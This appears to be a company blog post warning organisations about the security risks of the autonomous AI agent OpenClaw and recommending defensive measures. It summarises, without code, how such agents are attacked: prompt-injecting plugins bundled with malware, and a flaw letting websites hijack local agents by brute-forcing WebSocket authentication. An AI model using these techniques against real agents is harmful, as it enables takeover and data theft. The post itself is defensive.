Ergon InsightsErgon Insights
Back to Blog
AI
Security
Leadership
Strategy

OpenClaw Is Powerful. That's Exactly Why It's Dangerous.

March 2, 2026

If you've been in a room with a CTO or engineering leader in the past few months, you've probably heard the name OpenClaw. It's the open-source AI agent that went from a side project to over 215,000 GitHub stars seemingly overnight. And for good reason — it's genuinely impressive. OpenClaw can execute shell commands, read and write files, browse the web, manage your calendar, send emails, and take autonomous action across your entire digital life.

That's also exactly why it should concern you.

This isn't a scare piece. OpenClaw represents a real leap forward in what AI agents can do. But with that power comes a security profile that most organizations aren't equipped to manage — and the data coming in makes that clear. If your team is running OpenClaw, or if someone in your organization installed it on their own, this is what you need to understand.

What Is OpenClaw, Exactly?

OpenClaw (which has gone through a few name changes — it started as Clawdbot, briefly became Moltbot after a trademark dispute, and landed on OpenClaw) is an open-source AI agent created by developer Peter Steinberger. Unlike a chatbot that just answers questions, OpenClaw is agentic. It doesn't wait for you to do things. It does them.

It can run code on your machine. It can access your files. It can connect to third-party services through a plugin ecosystem called ClawHub. For developers and power users, it's a dream. For security teams, it's a new class of risk they're scrambling to get ahead of.

The Security Picture Right Now

Let's be specific. Here's what the security community has found in just the first few months of 2026:

Malicious Plugins Are Everywhere

Snyk's security researchers audited nearly 4,000 plugins from ClawHub (OpenClaw's plugin marketplace) and found that 36% contained detectable prompt injection. That's not a typo. More than a third. Of those, 1,467 were confirmed to contain malicious payloads, and 91% of the confirmed malicious samples combined prompt injection with traditional malware techniques. If someone on your team installs a ClawHub plugin without vetting it, they may be handing an attacker a direct line into their machine.

The "ClawJacked" Vulnerability

Oasis Security disclosed a vulnerability they named "ClawJacked" that allowed any website to silently take full control of a local OpenClaw agent. No plugins required, no user interaction needed. The attack exploited WebSocket connections to localhost, brute-forcing authentication at hundreds of attempts per second with no throttling or logging. OpenClaw patched this in version 2026.2.26 — but only after it was publicly disclosed.

Multiple CVEs, Ranging From Moderate to High

OpenClaw has been assigned seven CVEs so far in 2026, covering remote code execution, command injection, server-side request forgery, authentication bypass, and path traversal. These aren't theoretical risks — they're documented, reproducible vulnerabilities.

135,000+ Instances Exposed to the Internet

SecurityScorecard's scanning found over 135,000 OpenClaw instances exposed to the public internet across 82 countries. These aren't just hobbyist setups. They're showing up in healthcare, finance, government, and insurance environments. Many appear to be running inside corporate networks with no security controls in place.

The Shadow IT Problem

Here's the part that should get your attention if you're a business leader, not a security engineer: one in five organizations have deployed OpenClaw without IT approval. People are downloading it, connecting it to company systems, and running it on machines with access to sensitive data — because it's useful and it's free.

That's not malice. It's enthusiasm. But if a misconfigured OpenClaw instance gets compromised, an attacker doesn't just get access to one person's laptop. They get an AI agent with the permissions that person granted it — file access, shell commands, API keys, email. It becomes a highly capable tool working for the wrong team.

If You're Going to Run It, Run It Right

None of this means OpenClaw is inherently bad. It's a powerful tool, and powerful tools require discipline. If your organization has decided to use OpenClaw — or if you suspect someone already is — here's the security posture that makes it viable:

  1. Audit your environment now. Scan your network for exposed OpenClaw instances. If they're reachable from the internet, that's an immediate priority. Lock them down behind your firewall and require VPN access.
  2. Update to the latest version. The ClawJacked vulnerability was patched in version 2026.2.26. If you're running anything older, you're exposed. Make this non-negotiable.
  3. Vet every plugin before installation. ClawHub is not a curated app store. Treat every plugin as untrusted code until your team has reviewed it. Establish an approved list and enforce it.
  4. Apply the principle of least privilege. OpenClaw lets users grant sweeping permissions. Don't. Limit file system access, restrict shell command execution, and never store API keys or credentials where the agent can reach them.
  5. Create an organizational policy. Decide whether OpenClaw is approved, conditionally approved, or prohibited. Then communicate that clearly. The worst outcome is silence — because people will fill that silence by installing it anyway.
  6. Monitor and log agent activity. If OpenClaw is approved, ensure its actions are logged and auditable. You need visibility into what it's doing, what it's accessing, and what external connections it's making.
  7. Isolate it. Run OpenClaw in a sandboxed or containerized environment whenever possible. If it gets compromised, containment limits the blast radius.

The Bigger Picture

OpenClaw isn't the last AI agent that will present these challenges. It's the first one to go mainstream. The risks it exposes — autonomous execution, plugin supply chain attacks, shadow deployments — are inherent to the agentic AI model. Every organization that plans to use AI agents needs a security framework for them, not just a policy for chatbots.

The question isn't whether your people will want to use tools like OpenClaw. They already do. The question is whether you'll have the structure in place to let them do it safely.

Discipline equals freedom. That's as true in AI security as it is anywhere else.

Jason Oglesby is the founder of Ergon Insights, based in Johnson City, Tennessee. He brings 30+ years of experience in software development and technology leadership. Ergon (ἔργον) — one's proper work, done with excellence.

OpenClaw Is Powerful. That's Exactly Why It's Dangerous. | Ergon Insights